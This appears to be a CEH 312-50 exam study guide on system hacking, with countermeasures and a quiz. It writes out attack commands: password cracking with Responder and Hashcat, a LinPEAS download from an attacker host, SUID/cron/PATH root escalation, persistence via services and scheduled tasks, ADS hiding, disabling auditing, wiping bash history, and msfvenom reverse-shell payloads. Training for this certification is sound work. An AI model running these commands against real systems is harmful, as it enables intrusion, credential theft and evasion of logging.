Certification: EC-Council CEH 312-50
Exam Weight: ~17% (section System Hacking Phases and Attack Techniques)
Table of Contents
- Course Overview
- Clarifying CHM Phases
- Gaining Access: Cracking Passwords
- Gaining Access: More Cracking Methods
- Gaining Access: Escalating Privileges
- Linux Escalation: Advanced Techniques
- Maintaining Access: Executing Applications
- Maintaining Access: Hiding Your Tools
- Techniques for Establishing Persistence
- Clearing Logs: Covering Your Tracks
- Hashcat: Complete Guide
- Metasploit: Fundamentals
- Domain Summary
- Key Tools to Remember
- Essential Countermeasures
- CEH 312-50 Certification Quiz
1. Course Overview
This course is part of the CEH 312-50 certification preparation series by EC-Council. It specifically covers the System Hacking Phases and Attack Techniques objective, representing approximately 17% of the total exam.
Course Objectives
- Understand and apply the CEH Hacking Methodology (CHM)
- Master password cracking techniques
- Understand escalating privileges mechanisms (Windows and Linux)
- Know the techniques for maintaining access (keyloggers, spyware, backdoors)
- Know how to hide tools (rootkits, steganography, ADS)
- Understand how to cover tracks (log erasure)
- Master key tools: Hashcat, John the Ripper, Metasploit, Mimikatz, Responder
CEH v12/v13 Exam Information
| Criteria | Value |
|---|---|
| Duration | 4 hours |
| Questions | 125 multiple-choice questions |
| Passing Score | ~70% (variable per EC-Council) |
| Modules | 20 modules, 550+ attack techniques |
| Practical Labs | 221 hands-on labs |
| Practical Certification | CEH Master (theory + practical exam) |
Prerequisites (previous courses in the series)
- Reconnaissance / Footprinting
- Scanning
- Enumeration
- Vulnerability Analysis
2. Clarifying CHM Phases
The CEH Hacking Methodology (CHM)
EC-Council has defined its own methodology, known by the acronym CHM. This course series is structured exactly according to these phases.
flowchart TD
A[Reconnaissance Footprinting] --> B[Scanning Ports and Services]
B --> C[Enumeration Accounts Shares Services]
C --> D[Vulnerability Analysis]
D --> E[Gaining Access Password Cracking]
E --> F[Escalating Privileges]
F --> G[Executing Applications]
G --> H[Hiding Files Concealment]
H --> I[Covering Tracks Log Erasure]
style E fill:#e74c3c,color:#fff
style F fill:#e74c3c,color:#fff
style G fill:#e74c3c,color:#fff
style H fill:#e74c3c,color:#fff
style I fill:#e74c3c,color:#fff
The 5 Phases of System Hacking
| Phase | Description | Objective | Concrete Example |
|---|---|---|---|
| Gaining Access | Crack passwords | First entry point | Dictionary attack on an account |
| Escalating Privileges | Increase obtained rights | Become admin/root | Exploit HiveNightmare, SUID |
| Executing Applications | Install malicious software | Maintain access | Install keylogger / backdoor |
| Hiding Files | Conceal tools | Avoid detection | Hide an executable via ADS |
| Covering Tracks | Erase evidence | Avoid traceback | Delete system logs |
Critical exam point: Hiding Files (hiding active tools) ≠ Covering Tracks (erasing past evidence). These are two distinct phases in the CHM.
Decision Tree — Which Phase?
flowchart TD
Q{What action is
the attacker performing?}
Q --> A[Cracking a password
or exploiting a vulnerability to gain entry]
Q --> B[Escalating rights
from user to admin/root]
Q --> C[Installing rootkit,
keylogger, backdoor]
Q --> D[Hiding tools
and ongoing activities]
Q --> E[Clearing logs
and disabling auditing]
A --> A1[Gaining Access]
B --> B1[Escalating Privileges]
C --> C1[Executing Applications]
D --> D1[Hiding Files]
E --> E1[Covering Tracks]
Verification Quiz
| Question | Answer |
|---|---|
| Admin rights + rootkit installation → which phase? | Executing Applications |
| Exploiting vulnerabilities to crack passwords → ? | Gaining Access |
| Erasing evidence of activity → ? | Covering Tracks |
| Increasing access rights → ? | Escalating Privileges |
| Hiding tools and activities → ? | Hiding Files |
3. Gaining Access: Cracking Passwords
3.1 Fundamental Problems with Passwords
Passwords can be captured:
- Locally (SAM database, NTDS.dit, /etc/shadow)
- In transit (FTP transmits credentials in cleartext by default)
“Love is great, but not as a password.” — Matt Mullenweg (creator of WordPress).
Note: “love” is one of the 20 most commonly used passwords.
3.2 Password Complexity
| Element | Example | Note |
|---|---|---|
| Uppercase | A, B, Z | Do not use all uppercase |
| Lowercase | a, b, z | Mix with uppercase |
| Numbers | 0–9 | Insufficient alone |
| Special characters | !, @, #, space | The space bar is highly effective |
Tip: The space bar is one of the most effective special characters — attackers rarely anticipate it.
The “Fab Five” — Known Attacker Substitutions
| Common Substitution | What the Attacker Understands |
|---|---|
@ → a | p@ssword = password |
$ → S | pa$$word = password |
3 → E | passw3rd = password |
0 → O | passw0rd = password |
! → i or end | passw0rd! still predictable |
Golden rule: Use 15 characters minimum to bypass the LM Hash. Never rely on predictable substitutions.
3.3 Where Are Passwords Stored?
flowchart LR
subgraph Windows
A[Local machine] --> B["SAM Database\nC:\Windows\System32\config\sam"]
C[Domain-joined machine] --> D["NTDS.dit\nC:\Windows\NTDS\ntds.dit\n(on the Domain Controller)"]
end
subgraph Linux
E[Linux] --> F["/etc/shadow - hashes"]
E --> G["/etc/passwd - accounts"]
end
subgraph macOS
H[macOS] --> I["/Users/<user>.plist"]
end
| System | Location | Notes |
|---|---|---|
| Windows (local) | C:\Windows\System32\config\sam | SAM = Security Account Manager |
| Windows (domain) | C:\Windows\NTDS\ntds.dit | On each Domain Controller |
| Linux | /etc/shadow + /etc/passwd | Shadow contains the hashes |
| macOS | /Users/<user>.plist | Apple property format |
The SAM database is mounted in the registry under
HKEY_LOCAL_MACHINE\SAMat startup. It cannot be copied directly while live — but Volume Shadow Copies can bypass this protection.
3.4 Types of Password Cracking Attacks
flowchart TD
A[Password Cracking Attack Types] --> B[Passive Attacks]
A --> C[Non-Electronic Attacks]
A --> D[Offline Attacks]
A --> E[Active Online Attacks]
B --> B1[Network Sniffing - Wireshark tcpdump]
B --> B2[Replay attacks]
B --> B3[Man-in-the-Middle MitM]
C --> C1[Shoulder Surfing]
C --> C2[Social Engineering]
C --> C3[Dumpster Diving]
D --> D1[Pre-computed Rainbow Tables]
D --> D2[Distributed Network Attack GPU cloud]
E --> E1[Dictionary Attack - rockyou.txt]
E --> E2[Brute Force Attack]
E --> E3[Rule-based Attack]
E --> E4[Hash Injection Pass-the-Hash]
E --> E5[LLMNR Poisoning - Responder]
Passive Attacks: Sniffing (Wireshark, tcpdump), replay attacks, Man-in-the-Middle.
Non-Electronic: Shoulder surfing, social engineering, dumpster diving — no technology required.
Offline Attacks: The attacker obtains the password file and cracks it on their own systems.
- Rainbow tables: pre-computed hash tables
- Distributed network attack: distributed compute power (AWS, Azure GPU)
Active Online — Dictionary Attack: Text files with thousands of passwords.
rockyou.txt: ~14 million passwords- Multi-language dictionaries (French, Spanish, Klingon…)
- String manipulation:
computer→putercom(automatic anagrams)
Active Online — Brute Force Attack: Tries every possible combination — slow but exhaustive.
Active Online — Rule-based Attack: Combines dictionary + brute force with transformation rules.
3.5 Demo: HaveIBeenPwned
HaveIBeenPwned.com (Troy Hunt): check if an email address or password has been exposed in a data breach.
WARNING: Never enter your password on an external site that requires pressing Enter. The HaveIBeenPwned API uses k-anonymity — only the first 5 characters of the SHA-1 hash are sent.
3.6 The LM Hash — Historical Weaknesses
Password (max 14 chars)
→ Convert everything to UPPERCASE
→ Pad with spaces to 14 characters
→ Split into 2 strings of 7 characters
→ Encrypt each string separately with DES
→ Combine the 2 results = final LM Hash
| LM Hash Observation | Interpretation |
|---|---|
| Last 7 = first 7 | Password ≤ 7 characters |
| Pattern “AAD3B435B51404EE…” repeated | Password ≤ 7 characters (empty padding) |
Rule: Always use passwords of 15 characters or more to bypass the LM Hash.
3.7 Demo: Responder (LLMNR Poisoning)
LLMNR (Link-Local Multicast Name Resolution) and NetBIOS: Windows broadcasts multicast requests when DNS fails (e.g., typo in a hostname). Responder intercepts these broadcasts and captures the victim’s NTLMv2 hash.
sequenceDiagram
participant V as Victim (Windows)
participant R as Attacker (Responder)
participant DNS as DNS Server
V->>DNS: Query for "server2019" (typo)
DNS-->>V: NXDOMAIN (unknown host)
V->>R: LLMNR Broadcast - "Who is server2019?"
R-->>V: "That's me!" (impersonation)
V->>R: NTLMv2 Authentication - hash captured!
Note over R: Hash stored in a local text file
# Launch Responder on the eth0 network interface (Kali Linux)
responder -I eth0 -rdwv
# Crack the NTLMv2 hash with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
john --show crackme.txt
Countermeasure: Disable LLMNR and NetBIOS via GPO (Group Policy Object).
3.8 Password Cracking Tools
| Tool | Type | Platform | Description |
|---|---|---|---|
| L0phtCrack | GUI | Windows | Windows password auditing, open-source |
| John the Ripper | CLI | Linux/Multi | Versatile, supports many hash formats |
| Hashcat | CLI | Multi (GPU) | Ultra-fast, 300+ algorithms |
| THC-Hydra | CLI | Linux | Online brute force, multi-protocol |
| Medusa | CLI | Linux | Similar to Hydra, parallel |
| Cain & Abel | GUI | Windows | Cracking + sniffing + MitM + ARP poisoning |
| pwdump7 | CLI | Windows | Hash extraction from SAM |
| Responder | CLI | Kali Linux | Captures NTLMv2 via LLMNR/NetBIOS |
| Hiren’s BootCD | Bootable | — | Offline password recovery |
4. Gaining Access: More Cracking Methods
4.1 NTLM
Uses challenges and responses. Used without Kerberos.
4.2 Kerberos
Ticket-based. Max 5 minutes clock skew with the PDC.
| Term | Meaning |
|---|---|
| KDC | Key Distribution Center |
| TGT | Ticket Granting Ticket |
| PDC | Primary Domain Controller |
4.3 Salting
Adding a random string before hashing. Renders rainbow tables ineffective.
4.4 Rainbow Tables
Pre-computed hash tables. Cost ~$900 for an MD5 table on a 2TB hard drive.
4.5 Pass-the-Hash
Using the hash directly to authenticate without a plaintext password.
5. Gaining Access: Escalating Privileges
5.1 Concept
“It’s true. I had hacked into a lot of companies, and took a lot of copies of source code to analyze it for security bugs.” — Kevin Mitnick
Once initial access is obtained, the attacker aims to escalate rights to admin/root.
5.2 After Initial Compromise
- System administration misconfigurations
- Network infrastructure design flaws
- Unchanged default passwords
- Application programming vulnerabilities
5.3 4 Escalation Methods
- Pwn an admin/root account directly
- Exploit known vulnerabilities (CVEs)
- Abuse legitimate features (DLL Hijacking, Shimming)
- Configuration errors (NTFS permissions, SUID, sudo)
5.4 Types of Escalation
flowchart LR
subgraph Vertical
U1["Standard User"] -->|"Escalation"| A1["Administrator root"]
end
subgraph Horizontal
U2["User A"] -->|"Access"| U3["User B Data"]
end
Vertical: The user obtains administrative privileges (create accounts, modify config).
Horizontal: Access to another same-level user’s data — less detectable.
Offline Access: Stolen/disconnected machine — the attacker has all the time needed.
5.5 HiveNightmare (CVE-2021-36934)
Discovered August 2021: SAM database readable by normal users on certain Windows 10/11 (bad NTFS permissions + Shadow Copies).
:: Check if the system is vulnerable
icacls C:\Windows\System32\config\sam
:: VULNERABLE result: BUILTIN\Users:(I)(RX)
:: Patch: KB5004705 (Windows 10) or KB5004760 (Windows 11)
5.6 DLL Hijacking
Applications search for DLLs in the application directory first (if no absolute path is specified).
flowchart TD
A[Application starts] --> B{Searches for library.dll}
B --> C["1. Application directory"]
C --> D{Found?}
D -->|Yes| E["Loads DLL (could be malicious!)"]
D -->|No| F["2. C:\\Windows\\System32 (legitimate)"]
style E fill:#e74c3c,color:#fff
style F fill:#27ae60,color:#fff
Exploitation: Place a malicious DLL with the same name in the target application’s directory. Common vector: torrents of cracked software (Fortnite, Adobe Photoshop…).
5.7 Spectre and Meltdown
| Vulnerability | Affected Processors | Mechanism |
|---|---|---|
| Spectre | AMD, Apple, ARM, Intel, Samsung, Qualcomm | Speculative execution |
| Meltdown | Primarily Intel (not Qualcomm) | Kernel memory access from user space |
Exam note: Meltdown does not affect Qualcomm. Spectre affects all vendors.
5.8 Other Windows Techniques
Access Token Manipulation: Manipulate Windows tokens -> Spoofed Tokens.
Application Shimming: Abuse of WACF (Windows App Compatibility Framework) to bypass UAC, inject DLLs, or install backdoors.
Armitage: Graphical interface (GUI) for Metasploit.
6. Linux Escalation: Advanced Techniques
6.1 Attack Vector Overview
mindmap
root((Linux Privilege Escalation))
SUID Binaries
find / -perm -4000
bash -p
cp passwd injection
Sudo Abuse
sudo -l
GTFOBins
NOPASSWD entries
Cron Jobs
writable scripts
PATH hijacking
Capabilities
cap_setuid
Kernel Exploits
Public CVEs
6.2 Enumeration with LinPEAS
cd /tmp
wget http://ATTACKER_IP/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh
Color codes: Red = known vulnerability (GTFOBins) | Yellow = unusual | Green = standard
6.3 SUID Binaries
The SUID bit: the program runs with the rights of the file owner (often root).
# Enumerate all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
# Scenario 1: SUID bash
/usr/local/bin/rootbash -p # -p preserves effective UID
id # eUID=0 = root
# Scenario 2: SUID cp - injection into the accounts file
cat /etc/passwd > /tmp/passwd.new
# Add a UID 0 account in /tmp/passwd.new
cp /tmp/passwd.new /etc/passwd
su newroot
# Scenario 3: PATH Hijacking (SUID binary without absolute path)
echo "/bin/bash" > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/path/to/suid_binary # root shell!
# Scenario 4: SUID nano
nano /etc/passwd
# Remove the x from the root line -> passwordless login
6.4 Sudo Abuse
sudo -l # List available sudo commands
# Reference: https://gtfobins.github.io/#+sudo
6.5 Cron Jobs
cat /etc/crontab
ls -la /etc/cron.*
# If a cron script is writable:
echo "chmod +s /bin/bash" >> /path/to/cron_script.sh
# bash -p after cron executes
6.6 Enumeration Tools
| Tool | Usage |
|---|---|
| LinPEAS | Full Linux enumeration script |
| WinPEAS | Windows equivalent |
| GTFOBins | Catalog of abusable Unix binaries (gtfobins.github.io) |
| suid3num | Automated SUID enumeration + GTFOBins |
| LinEnum | Lightweight Linux enumeration script |
7. Maintaining Access: Executing Applications
7.1 Objective
After taking control of a system, the goal is to maintain access in order to:
- Always be able to return (even after a reboot)
- Explore the target’s network environment
- Collect additional information
A total pwn = returning to the system even after a reboot or password change.
7.2 Remote Code Execution (RCE)
| Technique | Vector | Description |
|---|---|---|
| Client Execution | Web browser | Spear phishing, drive-by |
| Office Exploits | Word/Excel | Malicious macros |
| Third-party Exploits | Adobe Reader, Flash | Third-party applications |
| Scheduled Tasks | Windows | at, schtasks |
| Service Execution | Windows SCM | Creating a malicious service |
| WMI | Windows | Local and remote execution |
:: Create a malicious service
sc create SvcName binPath= "C:\path\program.exe" start= auto
sc start SvcName
:: Execute via WMI remotely
wmic /node:TARGET process call create "cmd.exe /c program.exe"
:: Persistent scheduled task
schtasks /create /tn "TaskName" /tr "C:\program.exe" /sc onlogon /ru SYSTEM
7.3 Keyloggers
Record all keystrokes (and sometimes mouse clicks, screenshots).
| Type | Method | Detection Difficulty |
|---|---|---|
| Software (API hooking) | Intercepts Windows API calls | Easy (antivirus) |
| Software (Form grabbing) | Captures web forms before HTTPS | Moderate |
| Hardware (USB/PS2) | Looks like a physical adapter | Very difficult |
| Kernel-based | Kernel-level driver | Difficult |
Countermeasure: Regular physical inventories. Check the back of workstations.
7.4 Types of Spyware
| Type | Description |
|---|---|
| Desktop Spyware | Installed with an application (Next/Next/Next…) |
| Video Spyware | Webcam without indicator light |
| Audio Spyware | Activates the microphone in the background |
| GPS Spyware | Locates the device |
| Screenshot Spyware | Periodic screenshots |
Crackers: Tools that “unlock” software — often contain hidden malware.
7.5 Backdoors
Hidden access to a system, allowing the attacker to return at any time.
flowchart LR
A["Attacker - SERVER Component"] <-->|"Encrypted Communication"| B["Victim - CLIENT Component"]
style A fill:#e74c3c,color:#fff
style B fill:#3498db,color:#fff
Historical examples: NetBus (eject CD drive, invert mouse), Back Orifice, Metasploit.
8. Maintaining Access: Hiding Your Tools
8.1 Rootkits
The most formidable tool — modifies the operating system to make itself invisible and maintain persistent access.
Origin (2005): Sony installed a rootkit on ~22 million audio CDs as an anti-copy measure. Discovered by Mark Russinovich (Sysinternals). F-Secure was the first to flag it as dangerous.
Types of Rootkits
| Type | Level | Detection | Examples |
|---|---|---|---|
| User Mode | User space | Easy (antivirus) | FinFisher |
| Kernel Mode | System kernel | Difficult | Azazel |
| Firmware | BIOS/UEFI, HDD | Very difficult (persists after reinstall) | LoJax |
| Bootloader | MBR/UEFI boot record | Difficult (bypasses Secure Boot) | Grayfish |
| Hypervisor | Hypervisor layer | Extremely difficult | Blue Pill |
| Memory | Linux RAM disk | Difficult | Horse Pill |
Absolute rule: A system infected by a rootkit must be completely reinstalled. It can no longer be trusted.
Rootkit Detection
| Method | Tools |
|---|---|
| Integrity-based (baseline) | Tripwire, AIDE |
| Signature-based | Antivirus, F-Secure |
| Heuristic/Behavior-based | Behavioral analyzers |
:: Search for hidden files
dir /s /b /ah :: Hidden files
dir /s /b /a-h :: Normal files
:: Compare both lists to detect suspicious hidden files
8.2 Alternate Data Streams (ADS)
NTFS feature since Windows NT 3.1 for Mac compatibility (MHFS). The system stores data in two forks:
- Data fork: visible content
- Resource fork: metadata (and malicious ADS)
Fact: The majority of IT professionals have never heard of ADS!
mkdir C:\streams
cd C:\streams
echo Visible content > visible.txt
type program.exe > visible.txt:hidden.exe
:: visible.txt keeps its original size — the executable is invisible!
dir /r :: Reveals ADS
Get-Item -Stream * visible.txt :: PowerShell
8.3 Steganography
Hiding the existence of a message by concealing it in an ordinary file.
- Encryption: hides the content but signals that there is a secret
- Steganography: hides the very existence of the message
JPEG Image (1 MB) + Secret Document (4 MB) = Steganographic Image (5 MB)
| Classification | Description |
|---|---|
| Technical Steganography | Scientific method (LSB substitution) |
| Linguistic Steganography | Message hidden in linguistic content |
| Medium | Tools |
|---|---|
| Images (JPEG, PNG) | Steghide, OpenStego, SilentEye |
| Audio (MP3, WAV) | Steghide, MP3Stego |
| Documents | OpenPuff |
steghide embed -cf image.jpg -sf secret.txt -p Password123
steghide extract -sf image.jpg -p Password123
# Detection: stegdetect, zsteg
Real use case: Terrorist organizations use steganography to communicate via images publicly posted on social networks.
9. Techniques for Establishing Persistence
9.1 Concept
Allows maintaining unauthorized access even after reboots, password changes, or partial cleanup attempts.
flowchart TD
A[Attacker] --> B{Persistence Techniques}
B --> C[Remote Code Execution on Domain Controllers]
B --> D[Malicious Replication - DCSync]
B --> E[Skeleton Key Attack]
B --> F[Golden Ticket Attack - KRBTGT]
B --> G[Silver Ticket Attack - SAM]
B --> H[AdminSDHolder Manipulation]
B --> I[WMI Event Subscription]
B --> J[Overpass-the-Hash]
9.2 Remote Code Execution on Domain Controllers
Using WMI to execute code on a domain controller remotely.
9.3 Malicious Replication (DCSync)
Uses the DCSync service to replicate data from a DC to local systems. Objective: KRBTGT account (Kerberos master key).
9.4 Skeleton Key Attack
Modify the credentials of any domain account with a “universal” password.
9.5 Golden Ticket Attack
If the attacker obtains the KRBTGT account, they can forge a ticket that grants access to the entire domain — valid for up to 10 years!
flowchart LR
A[Attacker] -->|"1. Compromises an account"| B[Valid Account]
B -->|"2. Escalates to domain"| C[Domain Account]
C -->|"3. Steals KRBTGT hash"| D[KRBTGT Hash]
D -->|"4. Forges a Golden Ticket"| E["TOTAL domain access"]
style E fill:#e74c3c,color:#fff
9.6 Silver Ticket vs Golden Ticket
| Golden Ticket | Silver Ticket | |
|---|---|---|
| Target | Entire domain (AD) | A local system (SAM) |
| Hash used | KRBTGT hash | Service user hash |
| Scope | Entire domain | Single service/system |
9.7 AdminSDHolder
AD container that propagates rights to privileged accounts every 60 minutes. An attacker modifies it to maintain persistent access.
9.8 WMI Event Subscription
Create a WMI subscription to execute scripts. Advantage: No executable left on the system — untraceable.
9.9 Overpass-the-Hash
NTLM protocol weaknesses: use the hash to authenticate. Can bypass MFA.
9.10 Countermeasures
| Countermeasure | Description |
|---|---|
| Updates | Regularly patch systems |
| MFA | Multi-factor authentication |
| KRBTGT Rotation | Change KRBTGT twice in succession to invalidate Golden Tickets |
| AdminSDHolder | Monitor changes (EventID 4670) |
| WMI Logging | Monitor WMI events |
| Application Whitelisting | AppLocker, WDAC |
| DCSync Restriction | Replication rights only for legitimate DCs |
10. Clearing Logs: Covering Your Tracks
10.1 Why Cover Tracks?
- Stay in the shadows: avoid alerting defenders
- Prevent trace-backs: prevent a forensic expert from tracing back to the attacker
- Enable return: maintain the ability to come back to the system
“These are not the droids you’re looking for.” — Obi-Wan Kenobi
10.2 Basic Method (Good Attacker)
Simple actions but easily detectable:
- Clear browser history + cookies
- Delete temporary files
- Empty the recycle bin
Critical problem: Deleting logs leaves a trace! In the Windows Event Viewer, the first entry after clearing is a “Log Cleared” event indicating who deleted it and when.
10.3 Advanced Method (Expert Attacker)
flowchart LR
A["Disable auditing - auditpol"] --> B["Perform actions"] --> C["Re-enable auditing"]
style A fill:#e74c3c,color:#fff
style B fill:#c0392b,color:#fff
style C fill:#e74c3c,color:#fff
10.4 Important Windows Logs
Location: C:\Windows\System32\winevt\Logs\ (.evtx extension)
| Log | Key EventIDs | Description |
|---|---|---|
| Security | 4624 (logon), 4625 (failure) | Logins, rights modifications |
| System | Variable | System events |
| PowerShell | 4103, 4104 | PS script execution |
10.5 auditpol — Disable Auditing
:: Display audit policies
auditpol /get /category:*
:: Disable logon auditing
auditpol /set /subcategory:"Logon/Logoff" /success:disable /failure:disable
:: Re-enable after operations
auditpol /set /subcategory:"Logon/Logoff" /success:enable /failure:enable
10.6 Covering Bash Tracks (Linux)
history # View history
export HISTSIZE=0 # Clear in memory
cat /dev/null > ~/.bash_history # Clear on disk
unset HISTFILE # No recording
History remains in memory while the terminal is open. Close and reopen the terminal for the clear to take effect.
11. Hashcat: Complete Guide
11.1 Overview
Hashcat is the fastest cracking tool, using GPU acceleration.
| Feature | Value |
|---|---|
| Algorithms | 300+ (MD5, NTLM, SHA-1, SHA-256, bcrypt…) |
| Attack modes | 9 distinct modes |
| Acceleration | CPU, GPU, FPGA |
| License | Open-source (MIT) |
11.2 Attack Modes
| Mode | Number | Name | Description |
|---|---|---|---|
| Straight / Dictionary | -a 0 | Wordlist | Dictionary attack |
| Combination | -a 1 | Combinator | Concatenates words from two lists |
| Brute-Force / Mask | -a 3 | Mask | All combinations with a mask |
| Hybrid Wordlist + Mask | -a 6 | Hybrid | Dictionary + right-side mask |
| Hybrid Mask + Wordlist | -a 7 | Hybrid | Left-side mask + dictionary |
11.3 Built-in Charsets
| Symbol | Charset |
|---|---|
?l | abcdefghijklmnopqrstuvwxyz |
?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |
?d | 0123456789 |
?s | Special characters |
?a | All printable characters |
11.4 Common Hash Types (-m flag)
| Type | Code | Notes |
|---|---|---|
| MD5 | 0 | Very common |
| SHA-1 | 100 | Deprecated |
| SHA-256 | 1400 | Common |
| NTLM | 1000 | Windows passwords |
| NTLMv2 | 5600 | Captured by Responder |
| bcrypt | 3200 | Secure algorithm, slow |
| WPA/WPA2 | 22000 | Wi-Fi handshake |
11.5 Essential Commands
# GPU/CPU benchmark
hashcat -b
hashcat -hh # Show all modes
# Dictionary - MD5
hashcat -m 0 -a 0 md5.hash /usr/share/wordlists/rockyou.txt
# Dictionary - NTLM
hashcat -m 1000 -a 0 ntlm.hash /usr/share/wordlists/rockyou.txt
# Dictionary + transformation rules
hashcat -m 0 -a 0 hash.txt wordlist.txt -r rules/best64.rule
# Brute-force (6 arbitrary characters)
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
# Mask: 1 uppercase + 5 lowercase + 2 digits
hashcat -m 0 -a 3 hash.txt ?u?l?l?l?l?l?d?d
# Automatically identify hash type
hashcat --identify hash.txt
# Show results
hashcat -m 1000 hash.txt --show
12. Metasploit: Fundamentals
12.1 Architecture
flowchart TD
A[Metasploit Framework] --> B[Exploits - Code that exploits vulnerabilities]
A --> C[Payloads - Code executed after exploit]
A --> D[Auxiliary - Scanners, fuzzers]
A --> E[Post - Post-exploitation]
A --> F[Encoders - Avoid detection]
C --> C1[Singles - Standalone payload]
C --> C2[Stagers - Downloads the stage]
C --> C3[Stages - Meterpreter payload]
12.2 Essential Commands
msfconsole
help
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
info
show options
show payloads
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
run
Meterpreter Commands (after connection):
sysinfo # System information
getuid # Current user
getsystem # Attempt escalation
hashdump # Extract SAM hashes
ps # List processes
shell # cmd.exe shell
background # Move to background
sessions -l # List sessions
12.3 Payload Generation (msfvenom)
# Windows - reverse shell EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o agent.exe
# Linux - reverse shell ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o agent.elf
# PHP - web server
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
13. Domain Summary
mindmap
root((System Hacking CEH 312-50 17%))
Gaining Access
Password Cracking
SAM NTDS shadow
Dictionary Brute Force
Responder John Hashcat
More Cracking
NTLM Kerberos
Rainbow Tables Salting
Pass-the-Hash
Escalating Privileges
Windows
Vertical Horizontal
DLL Hijacking
HiveNightmare
Spectre Meltdown
Linux
SUID GTFOBins
Sudo Abuse
Cron Jobs PATH
Maintaining Access
Executing Apps
Keyloggers
Spyware
Backdoors Metasploit
Hiding Tools
Rootkits 6 types
ADS NTFS
Steganography
Persistence
Golden Silver Ticket
Skeleton Key DCSync
AdminSDHolder WMI
Covering Tracks
auditpol Event Viewer
Bash History
Phase Summary
| Phase | Objective | Key Tools |
|---|---|---|
| Gaining Access | Obtain credentials | Responder, John the Ripper, Hashcat, L0phtCrack |
| Escalating Privileges | Increase rights | Mimikatz, Metasploit, LinPEAS, GTFOBins |
| Executing Applications | Install and maintain | Metasploit, msfvenom, WMI, SCM |
| Hiding Files | Conceal tools | ADS, Steghide, rootkits |
| Covering Tracks | Erase evidence | auditpol, Event Viewer, bash history |
| Persistence | Maintain access | Mimikatz (Golden/Silver Ticket), WMI |
14. Key Tools to Remember
| Tool | Category | Platform | Description |
|---|---|---|---|
| John the Ripper | Password Cracking | Linux/Multi | Versatile, many formats |
| Hashcat | Password Cracking | Multi (GPU) | Ultra-fast, 300+ algorithms |
| THC-Hydra | Online Brute Force | Linux | Multi-protocol (HTTP, FTP, SSH…) |
| Medusa | Online Brute Force | Linux | Similar to Hydra, parallel |
| L0phtCrack | Password Auditing | Windows | Windows auditing, open-source |
| Cain & Abel | Password Cracking | Windows/GUI | Cracking + sniffing + MitM |
| Responder | LLMNR Poisoning | Kali Linux | Captures NTLMv2 via LLMNR |
| Mimikatz | Credential Dumping | Windows | Golden/Silver Ticket, PtH |
| Metasploit | Exploitation | Multi | Full exploitation framework |
| msfvenom | Payload Generation | Multi | Payload creation |
| Armitage | Exploitation | GUI | Graphical interface for Metasploit |
| Steghide | Steganography | Multi | Hide files in images/audio |
| Tripwire / AIDE | Rootkit Detection | Linux | Integrity-based detection |
| pwdump7 | Hash Dumping | Windows | Hash extraction from SAM |
| Wireshark | Sniffing | Multi | Traffic capture and analysis |
| LinPEAS/WinPEAS | Enumeration | Multi | Post-exploitation enumeration |
| GTFOBins | Reference | Web | Catalog of abusable Unix binaries |
Essential Commands
:: Windows - SAM and permissions
icacls C:\Windows\System32\config\sam
auditpol /get /category:*
auditpol /set /subcategory:"Logon/Logoff" /success:disable /failure:disable
dir /s /b /ah
dir /r
# Linux - password files
cat /etc/shadow
cat /etc/passwd
# Linux - SUID
find / -perm -u=s -type f 2>/dev/null
# Linux - history
history
export HISTSIZE=0
cat /dev/null > ~/.bash_history
# Kali - password cracking
responder -I eth0 -rdwv
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
hashcat -m 1000 -a 0 ntlm.hash wordlist.txt
hashcat -m 5600 -a 0 ntlmv2.hash wordlist.txt
# Steganography
steghide embed -cf image.jpg -sf secret.txt -p password
steghide extract -sf image.jpg -p password
15. Essential Countermeasures
15.1 Passwords
| Threat | Countermeasure | Priority |
|---|---|---|
| Dictionary attacks | Passwords 15+ characters | Critical |
| LM Hash | Passwords 15+ characters | Critical |
| LLMNR Poisoning | Disable LLMNR/NetBIOS via GPO | Critical |
| Rainbow Tables | Password salting | Critical |
| Pass-the-Hash | MFA, Credential Guard | Critical |
| Online Brute Force | Account lockout policy, rate limiting | High |
| Password reuse | Password manager | High |
15.2 Privilege Escalation
| Threat | Countermeasure |
|---|---|
| DLL Hijacking | Use absolute paths in applications |
| HiveNightmare | Patch Windows (KB5004705 / KB5004760) |
| Spectre/Meltdown | Firmware and OS updates |
| Misconfigured SUID | Regularly audit SUID binaries |
| Misconfigured sudo | Restrict sudoers, avoid NOPASSWD |
| Writable cron jobs | Strict permissions on cron scripts |
15.3 Persistence
| Threat | Countermeasure |
|---|---|
| Golden/Silver Ticket | Change KRBTGT twice in succession |
| DCSync | Restrict AD replication rights |
| WMI Subscription | Enable WMI logging |
| AdminSDHolder | Monitor modifications |
15.4 Defense in Depth
flowchart TD
A[Defense in Depth] --> B[Updates and patches]
A --> C[MFA on all privileged accounts]
A --> D[Physical and software inventories]
A --> E[Anti-phishing training]
A --> F[Application Whitelisting AppLocker]
A --> G[SIEM and centralized logs]
A --> H[Principle of least privilege]
A --> I[GPO - Disable LLMNR/NetBIOS]
style A fill:#2c3e50,color:#fff
16. CEH 312-50 Certification Quiz
16.1 CHM Phases
| Question | Answer |
|---|---|
| Admin rights + rootkit installation? | Executing Applications |
| Exploiting vulnerabilities to crack passwords? | Gaining Access |
| Erasing evidence of your presence? | Covering Tracks |
| Increasing access rights? | Escalating Privileges |
| Hiding tools and activities? | Hiding Files |
| Difference between Hiding Files vs Covering Tracks? | Hiding = concealing active tools; Covering = erasing past evidence |
16.2 Password Storage
| Question | Answer |
|---|---|
| Passwords on a domain controller? | NTDS.dit (C:\Windows\NTDS\ntds.dit) |
| Passwords on a local Windows machine? | SAM database (C:\Windows\System32\config\sam) |
| Passwords on Linux? | /etc/shadow (hashes) and /etc/passwd |
| Passwords on macOS? | /Users/<user>.plist |
| SAM database in the registry? | HKEY_LOCAL_MACHINE\SAM |
